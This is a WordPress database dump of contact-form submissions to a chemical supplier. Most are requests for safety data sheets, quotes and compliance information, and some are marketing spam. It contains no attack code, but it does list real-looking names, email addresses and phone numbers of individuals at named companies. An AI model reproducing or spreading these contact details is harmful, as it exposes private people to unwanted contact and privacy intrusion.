INSERT INTO `wp_postmeta` VALUES (35462, 3958, '_sub_id', '3958'); 
INSERT INTO `wp_postmeta` VALUES (35463, 3959, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35464, 3959, '_seq_num', '514'); 
INSERT INTO `wp_postmeta` VALUES (35465, 3959, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35466, 3959, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35467, 3959, '_field_1', 'John Tobeck'); 
INSERT INTO `wp_postmeta` VALUES (35468, 3959, '_field_10', 'Oceaneering'); 
INSERT INTO `wp_postmeta` VALUES (35469, 3959, '_field_2', 'jtobeck@oceaneering.com'); 
INSERT INTO `wp_postmeta` VALUES (35470, 3959, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35471, 3959, '_field_3', 'To whom it may concern:\r\n\r\nWe would gladly appreciate a digital copy of the Safety Data Sheet (SDS) for the following product:\r\nMS-122AD\r\nDPMS-Z0918A\r\nPTFE Release Agent/Dry Lubricant\r\n\r\nWe are currently in a remote offshore location, and are updating our SDS binders.\r\nWe received the SDS for the product when it was delivered but would like a higher quality digital copy onboard our vessel to make quality copies to place in our SDS binders.\r\nA pdf file would be sufficient.\r\n\r\nWe appreciate your time.  Thank you.\r\n-John Tobeck'); 
INSERT INTO `wp_postmeta` VALUES (35472, 3959, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35473, 3959, '_sub_id', '3959'); 
INSERT INTO `wp_postmeta` VALUES (35474, 3960, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35475, 3960, '_seq_num', '515'); 
INSERT INTO `wp_postmeta` VALUES (35476, 3960, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35477, 3960, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35478, 3960, '_field_1', 'Jake Brown'); 
INSERT INTO `wp_postmeta` VALUES (35479, 3960, '_field_10', 'Aculides'); 
INSERT INTO `wp_postmeta` VALUES (35480, 3960, '_field_2', 'jake@aculides.com'); 
INSERT INTO `wp_postmeta` VALUES (35481, 3960, '_field_8', '(186) 266-1520'); 
INSERT INTO `wp_postmeta` VALUES (35482, 3960, '_field_3', 'Hi,\r\n\r\nWould you be interested in a highly potential and responsive business database for your business marketing, events, exhibitions and conferences? We are the leading database solution provider and can certainly assist you by providing permission based contacts from any B2B industry.\r\n\r\nWe specialize with region based lists for your business benefits. Our extensive databases prove to be exclusive tools to promote your business. In addition to new databases, we can help you identify and fix the incorrect and missing fields in the databases that populate your CRM.\r\n\r\nPlease let me know if you want see some samples, \r\n\r\nI would be more than happy to run counts and samples for you based on the target demographics I receive from your end. If you need companies using specific Technologies like ERPs, CRMs, Servers, Cloud Platforms etc., please specify so I can provide Technology Specific Lists as well.\r\n\r\nLook forward to hearing from you soon.\r\n\r\n\r\nRegards,\r\nJake Brown \r\n________________\r\nSales/Marketing Dept.\r\nAculides\r\n\r\nTo edit mail preference, please reply with Leave Out in the Subject Line.'); 
INSERT INTO `wp_postmeta` VALUES (35483, 3960, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35484, 3960, '_sub_id', '3960'); 
INSERT INTO `wp_postmeta` VALUES (35485, 3961, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35486, 3961, '_seq_num', '516'); 
INSERT INTO `wp_postmeta` VALUES (35487, 3961, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35488, 3961, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35489, 3961, '_field_1', 'Jake Brown'); 
INSERT INTO `wp_postmeta` VALUES (35490, 3961, '_field_10', 'Aculides'); 
INSERT INTO `wp_postmeta` VALUES (35491, 3961, '_field_2', 'jake@aculides.com'); 
INSERT INTO `wp_postmeta` VALUES (35492, 3961, '_field_8', '(186) 266-1520'); 
INSERT INTO `wp_postmeta` VALUES (35493, 3961, '_field_3', 'Hi,\r\n\r\nWould you be interested in a highly potential and responsive business database for your business marketing, events, exhibitions and conferences? We are the leading database solution provider and can certainly assist you by providing permission based contacts from any B2B industry.\r\n\r\nWe specialize with region based lists for your business benefits. Our extensive databases prove to be exclusive tools to promote your business. In addition to new databases, we can help you identify and fix the incorrect and missing fields in the databases that populate your CRM.\r\n\r\nPlease let me know if you want see some samples, \r\n\r\nI would be more than happy to run counts and samples for you based on the target demographics I receive from your end. If you need companies using specific Technologies like ERPs, CRMs, Servers, Cloud Platforms etc., please specify so I can provide Technology Specific Lists as well.\r\n\r\nLook forward to hearing from you soon.\r\n\r\n\r\nRegards,\r\nJake Brown \r\n________________\r\nSales/Marketing Dept.\r\nAculides\r\n\r\nTo edit mail preference, please reply with Leave Out in the Subject Line.'); 
INSERT INTO `wp_postmeta` VALUES (35494, 3961, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35495, 3961, '_sub_id', '3961'); 
INSERT INTO `wp_postmeta` VALUES (35496, 3962, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35497, 3962, '_seq_num', '517'); 
INSERT INTO `wp_postmeta` VALUES (35498, 3962, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35499, 3962, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35500, 3962, '_field_1', 'Geoffrey Agostini'); 
INSERT INTO `wp_postmeta` VALUES (35501, 3962, '_field_10', 'Omega Manufacturing Ltd'); 
INSERT INTO `wp_postmeta` VALUES (35502, 3962, '_field_2', 'gma@omegamanufacturing.co'); 
INSERT INTO `wp_postmeta` VALUES (35503, 3962, '_field_8', '(868) 361-3711'); 
INSERT INTO `wp_postmeta` VALUES (35504, 3962, '_field_3', 'We are looking for a semi permanent mold release agent to use in the production of 40kg/m3 urethane foam panels . the panel size is 4 ft x 8ft x 4 ins.\r\nThe mold is aluminum.\r\nwe have to make an early decision so your quick response would be apppreciated'); 
INSERT INTO `wp_postmeta` VALUES (35505, 3962, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35506, 3962, '_sub_id', '3962'); 
INSERT INTO `wp_postmeta` VALUES (35507, 3963, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35508, 3963, '_seq_num', '518'); 
INSERT INTO `wp_postmeta` VALUES (35509, 3963, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35510, 3963, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35511, 3963, '_field_1', 'Arthur James'); 
INSERT INTO `wp_postmeta` VALUES (35512, 3963, '_field_10', 'V3 Data Intel Inc'); 
INSERT INTO `wp_postmeta` VALUES (35513, 3963, '_field_2', 'arthur.james@v3dataintel.com'); 
INSERT INTO `wp_postmeta` VALUES (35514, 3963, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35515, 3963, '_field_3', 'Hi, \r\n\r\nI just wanted to check would you be interested in Email list of ‘Composite Industry Professionals’ from these industries? - Aerospace, Automobile, Defence, Manufacturing, Marine, Textile, Transportation, etc.,\r\n\r\nTo Name Few Titles: CEO’s, COO’s, CFO’s, Owners, VP’s, Presidents, Engineers, Scientists, R&amp;D, Purchasing/Procurement etc., \r\n\r\nShould you be targeting any specific industry? We have data for all industries- Please let me know your target audience, I will get back to you with counts and best pricing option. \r\n\r\nLook forward to hearing from you. \r\n'); 
INSERT INTO `wp_postmeta` VALUES (35516, 3963, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35517, 3963, '_sub_id', '3963'); 
INSERT INTO `wp_postmeta` VALUES (35518, 3964, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35519, 3964, '_seq_num', '519'); 
INSERT INTO `wp_postmeta` VALUES (35520, 3964, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35521, 3964, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35522, 3964, '_field_1', 'shakeel'); 
INSERT INTO `wp_postmeta` VALUES (35523, 3964, '_field_10', 'abdul kareem fadl tading'); 
INSERT INTO `wp_postmeta` VALUES (35524, 3964, '_field_2', 'shakeel.ahmed@aktcorp.com'); 
INSERT INTO `wp_postmeta` VALUES (35525, 3964, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35526, 3964, '_field_3', 'send me reply on email, i have requiremnt '); 
INSERT INTO `wp_postmeta` VALUES (35527, 3964, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35528, 3964, '_sub_id', '3964'); 
INSERT INTO `wp_postmeta` VALUES (35529, 3965, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35530, 3965, '_seq_num', '520'); 
INSERT INTO `wp_postmeta` VALUES (35531, 3965, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35532, 3965, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35533, 3965, '_field_1', 'Mohammad Nizamuddin'); 
INSERT INTO `wp_postmeta` VALUES (35534, 3965, '_field_10', 'HAKA MOTORS CO'); 
INSERT INTO `wp_postmeta` VALUES (35535, 3965, '_field_2', 'mnizamuddin@hakamotors.com'); 
INSERT INTO `wp_postmeta` VALUES (35536, 3965, '_field_8', '(013) 857-0096'); 
INSERT INTO `wp_postmeta` VALUES (35537, 3965, '_field_3', 'SEC RFQ for few items from your company, please send the contact details for your sales dept.'); 
INSERT INTO `wp_postmeta` VALUES (35538, 3965, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35539, 3965, '_sub_id', '3965'); 
INSERT INTO `wp_postmeta` VALUES (35540, 3966, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35541, 3966, '_seq_num', '521'); 
INSERT INTO `wp_postmeta` VALUES (35542, 3966, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35543, 3966, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35544, 3966, '_field_1', 'Chris Manford'); 
INSERT INTO `wp_postmeta` VALUES (35545, 3966, '_field_10', 'Stone Enterprises, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (35546, 3966, '_field_2', 'mmanfordchris@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35547, 3966, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35548, 3966, '_field_3', 'Please provide the SDS for the TFE Release Agent Dry Lubricant MS-122DF as per OSHA 1910.1200.  Thank you.\n'); 
INSERT INTO `wp_postmeta` VALUES (35549, 3966, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35550, 3966, '_sub_id', '3966'); 
INSERT INTO `wp_postmeta` VALUES (35551, 3967, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35552, 3967, '_seq_num', '267'); 
INSERT INTO `wp_postmeta` VALUES (35553, 3967, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35554, 3967, '_field_12', 'Bryn Pittinger'); 
INSERT INTO `wp_postmeta` VALUES (35555, 3967, '_field_13', 'United Airlines'); 
INSERT INTO `wp_postmeta` VALUES (35556, 3967, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35557, 3967, '_field_14', 'bryn.pittinger@erm.com'); 
INSERT INTO `wp_postmeta` VALUES (35558, 3967, '_field_15', '(312) 229-1982'); 
INSERT INTO `wp_postmeta` VALUES (35559, 3967, '_field_16', 'Hello,\r\n\r\nI am writing on behalf of United Airlines to request VOC content information for the following products:\r\nMS-122AD, DPMS-Z0918A, PTFE Release Agent/ Dry Lubricant\r\nMS-122XD PTFE Release Agent/ Dry Lubricant (Formerly DPMS-Z0612A)\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35560, 3967, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35561, 3967, '_sub_id', '3967'); 
INSERT INTO `wp_postmeta` VALUES (35562, 3968, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35563, 3968, '_seq_num', '522'); 
INSERT INTO `wp_postmeta` VALUES (35564, 3968, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35565, 3968, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35566, 3968, '_field_1', 'Sara Watson'); 
INSERT INTO `wp_postmeta` VALUES (35567, 3968, '_field_10', 'SGS'); 
INSERT INTO `wp_postmeta` VALUES (35568, 3968, '_field_2', 'sara.watson@lists-buliders.com'); 
INSERT INTO `wp_postmeta` VALUES (35569, 3968, '_field_8', '(888) 882-2064'); 
INSERT INTO `wp_postmeta` VALUES (35570, 3968, '_field_3', 'Hi,\r\n\r\nHope you’re doing well.\r\n\r\nI understand that you’re one of the exhibitors at “The Space Tech Expo USA 2017” taking place on May 23rd- 25th 2017, Pasadena, CA, USA.  \r\n\r\nI’m reaching out to check if you would be interested in acquiring list of “Attendees and Aerospace and Aviation Industry Database” to see a real time ascending curves for your products and services and launch a new email campaigns.\r\n\r\nWe have an extensive list of “Aerospace and Aviation Industry” with verified professionals email address and phone numbers for your review. The list can be used for Appointment settings, Email campaigns, Networking, Social media appending and many more.\r\n\r\nComplete Data fields: All our records includes permission based business email addresses and complete business contacts like contact name, company name, company URL, title, phone number, fax number, physical address, employee size, revenue size, SIC code, industry classification, technology used and last verified date.\r\n\r\nPlease write back a line with your requirement so that I can get back to you with newly updated counts, and relevant data sample just for your review. \r\n\r\nWe would be delighted to hear from you!\r\n\r\nThanks &amp; Regards,\r\nSara Watson| Marketing &amp; Business Development coordinator \r\nEmail: sara.watson@lists-buliders.com\r\nPhone:  +1 888- 882- 2064\r\n\r\nConsumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services\r\n\r\n\r\n\r\nThe information contained in this email is intended only for its addressee and may contain confidential and/or privileged information. If the reader of this email is not the intended recipient, you are hereby notified that reading, saving, distribution or use of the content of this email in any way is prohibited. If you have received this email in error, please notify the sender and delete the email. We use updated antivirus protection software. We do not accept any responsibility for damages caused anyhow by viruses transmitted via email.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35571, 3968, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35572, 3968, '_sub_id', '3968'); 
INSERT INTO `wp_postmeta` VALUES (35573, 3969, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35574, 3969, '_seq_num', '523'); 
INSERT INTO `wp_postmeta` VALUES (35575, 3969, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35576, 3969, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35577, 3969, '_field_1', 'Madeline Meacham'); 
INSERT INTO `wp_postmeta` VALUES (35578, 3969, '_field_10', 'Activar Inc.'); 
INSERT INTO `wp_postmeta` VALUES (35579, 3969, '_field_2', 'mameacham@activarcpg.com'); 
INSERT INTO `wp_postmeta` VALUES (35580, 3969, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35581, 3969, '_field_3', 'I am looking to obtain the safety data sheet for the Cleaning Solvent MS-941/CO2. Please let me know if you are able to provide this for me.\n\nThanks,\nMadeline'); 
INSERT INTO `wp_postmeta` VALUES (35582, 3969, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35583, 3969, '_sub_id', '3969'); 
INSERT INTO `wp_postmeta` VALUES (35584, 3970, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35585, 3970, '_seq_num', '524'); 
INSERT INTO `wp_postmeta` VALUES (35586, 3970, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35587, 3970, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35588, 3970, '_field_1', 'John Zolp'); 
INSERT INTO `wp_postmeta` VALUES (35589, 3970, '_field_10', 'Knowles Corporation'); 
INSERT INTO `wp_postmeta` VALUES (35590, 3970, '_field_2', 'john.zolp@knowles.com'); 
INSERT INTO `wp_postmeta` VALUES (35591, 3970, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35592, 3970, '_field_3', 'Hi... we are using both your MS-122DF and MS-122AD.... what is the difference between these Release Agents?\n\nThank you,\n\nJohn'); 
INSERT INTO `wp_postmeta` VALUES (35593, 3970, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35594, 3970, '_sub_id', '3970'); 
INSERT INTO `wp_postmeta` VALUES (35595, 3971, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35596, 3971, '_seq_num', '268'); 
INSERT INTO `wp_postmeta` VALUES (35597, 3971, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35598, 3971, '_field_12', 'Joe Cieply'); 
INSERT INTO `wp_postmeta` VALUES (35599, 3971, '_field_13', 'CR BARD inc.'); 
INSERT INTO `wp_postmeta` VALUES (35600, 3971, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35601, 3971, '_field_14', 'joe.cieply@crbard.com'); 
INSERT INTO `wp_postmeta` VALUES (35602, 3971, '_field_15', '(518) 502-2511'); 
INSERT INTO `wp_postmeta` VALUES (35603, 3971, '_field_16', 'We purchase &quot;EPIKURE 3125&quot; under our P/N RM0872002, Rev 04.\r\n\r\nCan you provide information on an &quot;elevated temperature curing schedule&quot; for this curing agent?\r\n\r\nRegards,\r\nJoe'); 
INSERT INTO `wp_postmeta` VALUES (35604, 3971, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35605, 3971, '_sub_id', '3971'); 
INSERT INTO `wp_postmeta` VALUES (35606, 3972, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35607, 3972, '_seq_num', '525'); 
INSERT INTO `wp_postmeta` VALUES (35608, 3972, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35609, 3972, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35610, 3972, '_field_1', 'ROBERT MORNEAU'); 
INSERT INTO `wp_postmeta` VALUES (35611, 3972, '_field_10', 'HYDRA-AIR PACIFIC'); 
INSERT INTO `wp_postmeta` VALUES (35612, 3972, '_field_2', 'BOBBY@HYDRAAIRPACIFIC.COM'); 
INSERT INTO `wp_postmeta` VALUES (35613, 3972, '_field_8', '(808) 479-7078'); 
INSERT INTO `wp_postmeta` VALUES (35614, 3972, '_field_3', 'INTERESTED IN PURCHASING KRYTOX 240 IN CARTRIDGES AND CARTRIDGES FOR MY CUSTOMER  IN CASE QUANTIES   PLEASE SEND ME A QUOTE  WE ARE IN HAWAII'); 
INSERT INTO `wp_postmeta` VALUES (35615, 3972, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35616, 3972, '_sub_id', '3972'); 
INSERT INTO `wp_postmeta` VALUES (35617, 3973, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35618, 3973, '_seq_num', '526'); 
INSERT INTO `wp_postmeta` VALUES (35619, 3973, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35620, 3973, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35621, 3973, '_field_1', 'Richie'); 
INSERT INTO `wp_postmeta` VALUES (35622, 3973, '_field_10', 'RAH Industires'); 
INSERT INTO `wp_postmeta` VALUES (35623, 3973, '_field_2', 'richie@rah-ind.com'); 
INSERT INTO `wp_postmeta` VALUES (35624, 3973, '_field_8', '(661) 295-5190'); 
INSERT INTO `wp_postmeta` VALUES (35625, 3973, '_field_3', 'Please quote \nlubricant, grease\nfluorinated, H-VAC, KRYTOX LVP\n#C795968-1'); 
INSERT INTO `wp_postmeta` VALUES (35626, 3973, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35627, 3973, '_sub_id', '3973'); 
INSERT INTO `wp_postmeta` VALUES (35628, 3974, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35629, 3974, '_seq_num', '527'); 
INSERT INTO `wp_postmeta` VALUES (35630, 3974, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35631, 3974, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35632, 3974, '_field_1', 'shakeel'); 
INSERT INTO `wp_postmeta` VALUES (35633, 3974, '_field_10', 'abdul kareem fadl tading'); 
INSERT INTO `wp_postmeta` VALUES (35634, 3974, '_field_2', 'shakeel.ahmed@aktcorp.com'); 
INSERT INTO `wp_postmeta` VALUES (35635, 3974, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35636, 3974, '_field_3', 'Dear sir,\r\n\r\nPlease revert back to me i have enquiry on your product '); 
INSERT INTO `wp_postmeta` VALUES (35637, 3974, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35638, 3974, '_sub_id', '3974'); 
INSERT INTO `wp_postmeta` VALUES (35639, 3975, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35640, 3975, '_seq_num', '528'); 
INSERT INTO `wp_postmeta` VALUES (35641, 3975, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35642, 3975, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35643, 3975, '_field_1', 'HAMID HARIDY'); 
INSERT INTO `wp_postmeta` VALUES (35644, 3975, '_field_10', 'al-sawi trading est.'); 
INSERT INTO `wp_postmeta` VALUES (35645, 3975, '_field_2', 'alsawiest14@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35646, 3975, '_field_8', '(011) 412-0789'); 
INSERT INTO `wp_postmeta` VALUES (35647, 3975, '_field_3', 'DEAR SIR,\r\nWE SENT AN INQUIRY THRU THE E-MAIL ADDRESS:ctsales@mschem.com\r\nwe hope to receive your offer shortly'); 
INSERT INTO `wp_postmeta` VALUES (35648, 3975, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35649, 3975, '_sub_id', '3975'); 
INSERT INTO `wp_postmeta` VALUES (35650, 3976, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35651, 3976, '_seq_num', '269'); 
INSERT INTO `wp_postmeta` VALUES (35652, 3976, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35653, 3976, '_field_12', 'Mark Fields'); 
INSERT INTO `wp_postmeta` VALUES (35654, 3976, '_field_13', 'Kollmorgen Corporation'); 
INSERT INTO `wp_postmeta` VALUES (35655, 3976, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35656, 3976, '_field_14', 'mark.fields@kollomorgen.com'); 
INSERT INTO `wp_postmeta` VALUES (35657, 3976, '_field_15', '(540) 731-5646'); 
INSERT INTO `wp_postmeta` VALUES (35658, 3976, '_field_16', '          I am contacting you to request certification of compliance to RoHS (Directive 2011/65/EC including Commission Delegated Directive 2015/863 amending Annex II of 2011/65/EC).  Please list all exemptions claimed.  I also request information on REACH (Regulation No. EC/1907/2006) compliance, including identification and amounts of any Substances of Very High Concern (SVHC) present in Conformal Coating MS-462.  The current “Candidate List” of 173 Substances of Very High Concern (SVHC), updated 12 January 2017, can be found at http://echa.europa.eu/candidate-list-table. '); 
INSERT INTO `wp_postmeta` VALUES (35659, 3976, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35660, 3976, '_sub_id', '3976'); 
INSERT INTO `wp_postmeta` VALUES (35661, 3977, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35662, 3977, '_seq_num', '529'); 
INSERT INTO `wp_postmeta` VALUES (35663, 3977, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35664, 3977, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35665, 3977, '_field_1', 'Bryan Chua'); 
INSERT INTO `wp_postmeta` VALUES (35666, 3977, '_field_10', 'Tribulink Sdn. Bhd. '); 
INSERT INTO `wp_postmeta` VALUES (35667, 3977, '_field_2', 'bryan.chua@tribulink.com.my'); 
INSERT INTO `wp_postmeta` VALUES (35668, 3977, '_field_8', '(601) 247-0603'); 
INSERT INTO `wp_postmeta` VALUES (35669, 3977, '_field_3', 'Please advice your distributor name and contact in Malaysia . Thank you .\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35670, 3977, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35671, 3977, '_sub_id', '3977'); 
INSERT INTO `wp_postmeta` VALUES (35672, 3978, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35673, 3978, '_seq_num', '530'); 
INSERT INTO `wp_postmeta` VALUES (35674, 3978, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35675, 3978, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35676, 3978, '_field_1', 'Chris DiPisa'); 
INSERT INTO `wp_postmeta` VALUES (35677, 3978, '_field_10', 'General Electric'); 
INSERT INTO `wp_postmeta` VALUES (35678, 3978, '_field_2', 'christon.j.dipisa@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (35679, 3978, '_field_8', '(518) 385-5617'); 
INSERT INTO `wp_postmeta` VALUES (35680, 3978, '_field_3', 'I would like a quote request for 10 gallons Vertrel XF.'); 
INSERT INTO `wp_postmeta` VALUES (35681, 3978, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35682, 3978, '_sub_id', '3978'); 
INSERT INTO `wp_postmeta` VALUES (35683, 3979, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35684, 3979, '_seq_num', '531'); 
INSERT INTO `wp_postmeta` VALUES (35685, 3979, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35686, 3979, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35687, 3979, '_field_1', 'KEENAN NEMOTO'); 
INSERT INTO `wp_postmeta` VALUES (35688, 3979, '_field_10', 'Hydra Air Pacific Inc.'); 
INSERT INTO `wp_postmeta` VALUES (35689, 3979, '_field_2', 'keenan@hydraairpacific.com'); 
INSERT INTO `wp_postmeta` VALUES (35690, 3979, '_field_8', '(808) 479-7077'); 
INSERT INTO `wp_postmeta` VALUES (35691, 3979, '_field_3', 'provide SDS sheet for Krytox oxygen lubricant'); 
INSERT INTO `wp_postmeta` VALUES (35692, 3979, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35693, 3979, '_sub_id', '3979'); 
INSERT INTO `wp_postmeta` VALUES (35694, 3980, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35695, 3980, '_seq_num', '532'); 
INSERT INTO `wp_postmeta` VALUES (35696, 3980, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35697, 3980, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35698, 3980, '_field_1', 'Mary Johnson'); 
INSERT INTO `wp_postmeta` VALUES (35699, 3980, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (35700, 3980, '_field_2', 'maryjohnson.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35701, 3980, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (35702, 3980, '_field_3', 'Hi,\r\n\r\nI wanted to reach out about a time this week that might work to schedule a call. \r\n\r\nI saw your site while doing an analysis on companies advertising through Google Adwords, but that don&#039;t seem to be as optimized for Google&#039;s organic results. I&#039;ve noticed a few things while running an audit on your site that I think could help you increase the ROI you&#039;re seeing from your online presence. If you don&#039;t mind my asking, what kinds of marketing are you currently doing? \r\n\r\nI work for an Inc 500 marketing agency based out of Los Angeles. Our team specializes in custom marketing campaigns based around a Google-friendly, content-centric approaches that improve exposure with with onsite optimization and drive traffic from off-site promotion like content marketing, social media, and sponsored influencer marketing.  \r\n\r\nIf you have a moment this week, I&#039;d love to show you the report I&#039;ve run on your site and share some ideas for improvement I&#039;ve noticed. If you&#039;re interested in trying to generate more customers from your site, I know it would be helpful for your team. \r\n\r\nWhat is the best phone number to reach you?\r\n\r\nBest,\r\n\r\nMary Johnson\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (35703, 3980, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35704, 3980, '_sub_id', '3980'); 
INSERT INTO `wp_postmeta` VALUES (35705, 3981, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35706, 3981, '_seq_num', '533'); 
INSERT INTO `wp_postmeta` VALUES (35707, 3981, '_action', 'submit'); 
